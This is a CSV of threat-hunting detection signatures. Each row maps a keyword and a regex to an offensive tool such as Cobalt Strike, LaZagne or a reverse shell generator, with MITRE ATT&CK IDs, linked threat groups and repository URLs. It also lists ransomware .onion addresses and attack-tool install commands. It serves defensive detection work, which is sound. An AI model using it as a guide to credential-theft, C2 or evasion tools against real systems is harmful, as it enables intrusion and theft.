"*Appblock.exe --add*",".{0,1000}Appblock\.exe\s\-\-add.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","33973"
"*Appblock.exe --list*",".{0,1000}Appblock\.exe\s\-\-list.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","33974"
"*appdata*\Windows:svchost.exe*",".{0,1000}appdata.{0,1000}\\Windows\:svchost\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","33975"
"*appdata*\Windows:winrm.vbs*",".{0,1000}appdata.{0,1000}\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","33976"
"*AppData\Roaming\(s)AINT*",".{0,1000}AppData\\Roaming\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","33979"
"*Append IOC watermark to injected shellcode*",".{0,1000}Append\sIOC\swatermark\sto\sinjected\sshellcode.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","33982"
"*apple_ios/aarch64/meterpreter_reverse_tcp*",".{0,1000}apple_ios\/aarch64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","33983"
"*applenotes2john.py*",".{0,1000}applenotes2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33984"
"*Applet_ReverseTCP.jar*",".{0,1000}Applet_ReverseTCP\.jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","33985"
"*Application.Lazagne.H*",".{0,1000}Application\.Lazagne\.H.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","33988"
"*Application::C2Sock*",".{0,1000}Application\:\:C2Sock.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","33991"
"*AppLocker Bypass PowerShell Runspace.csproj*",".{0,1000}AppLocker\sBypass\sPowerShell\sRunspace\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","33997"
"*applocker_enum*",".{0,1000}applocker_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","33998"
"*applocker-enumerator*",".{0,1000}applocker\-enumerator.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","33999"
"*AppProxyC2CertificateCreator.exe*",".{0,1000}AppProxyC2CertificateCreator\.exe.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","1","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","34000"
"*apt install *tor2web*",".{0,1000}apt\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","34002"
"*apt install asleap*",".{0,1000}apt\sinstall\sasleap.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","34003"
"*apt install crunch*",".{0,1000}apt\sinstall\scrunch.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34004"
"*apt install dns2tcp*",".{0,1000}apt\sinstall\sdns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","34005"
"*apt install gpp-decrypt*",".{0,1000}apt\sinstall\sgpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","34007"
"*apt install gsocket*",".{0,1000}apt\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34008"
"*apt install hyperion*",".{0,1000}apt\sinstall\shyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34009"
"*apt install polenum*",".{0,1000}apt\sinstall\spolenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","34010"
"*apt install powershell-empire*",".{0,1000}apt\sinstall\spowershell\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","34011"
"*apt install proxychains*",".{0,1000}apt\sinstall\sproxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","34012"
"*apt install seclists*",".{0,1000}apt\sinstall\sseclists.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","34014"
"*apt install set -y*",".{0,1000}apt\sinstall\sset\s\-y.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","34015"
"*apt install tor *",".{0,1000}apt\sinstall\stor\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","34016"
"*apt install wce*",".{0,1000}apt\sinstall\swce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","34017"
"*apt install winexe*",".{0,1000}apt\sinstall\swinexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","34018"
"*APT stands for Advanced Persistence Tomato*",".{0,1000}APT\sstands\sfor\sAdvanced\sPersistence\sTomato.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","34019"
"*apt* install john*",".{0,1000}apt.{0,1000}\sinstall\sjohn.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34020"
"*apt/etumbot.py*",".{0,1000}apt\/etumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34021"
"*apt/putterpanda.py*",".{0,1000}apt\/putterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34022"
"*apt1_virtuallythere.profile*",".{0,1000}apt1_virtuallythere\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","34024"
"*APT64/EternalHushFramework*",".{0,1000}APT64\/EternalHushFramework.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","34025"
"*apt-get install *tor2web*",".{0,1000}apt\-get\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","34026"
"*apt-get install gsocket*",".{0,1000}apt\-get\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34027"
"*apt-get install isc-dhcp-server net-tools*",".{0,1000}apt\-get\sinstall\sisc\-dhcp\-server\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","34028"
"*apt-get install libqt5webenginewidgets5 libqt5websockets5*",".{0,1000}apt\-get\sinstall\slibqt5webenginewidgets5\slibqt5websockets5.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34029"
"*apt-get install -y --force-yes kali-archive-keyring && *",".{0,1000}apt\-get\sinstall\s\-y\s\-\-force\-yes\skali\-archive\-keyring\s\&\&\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","34031"
"*apt-get -y install tor *",".{0,1000}apt\-get\s\-y\sinstall\stor\s.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","34032"
"*APTortellini/unDefender*",".{0,1000}APTortellini\/unDefender.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","34033"
"*APTSimulator*",".{0,1000}APTSimulator.{0,1000}","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","N/A","10","2570","439","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z","34034"
"*apvc24autvavxuc6.onion*",".{0,1000}apvc24autvavxuc6\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34035"
"*apvc24autvavxuc6.onion.cab*",".{0,1000}apvc24autvavxuc6\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34036"
"*apvc24autvavxuc6.onion.city*",".{0,1000}apvc24autvavxuc6\.onion\.city.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34037"
"*apvc24autvavxuc6.onion.to*",".{0,1000}apvc24autvavxuc6\.onion\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34038"
"*apypykatz.py*",".{0,1000}apypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","34039"
"*AQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkg*",".{0,1000}AQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkg.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","34040"
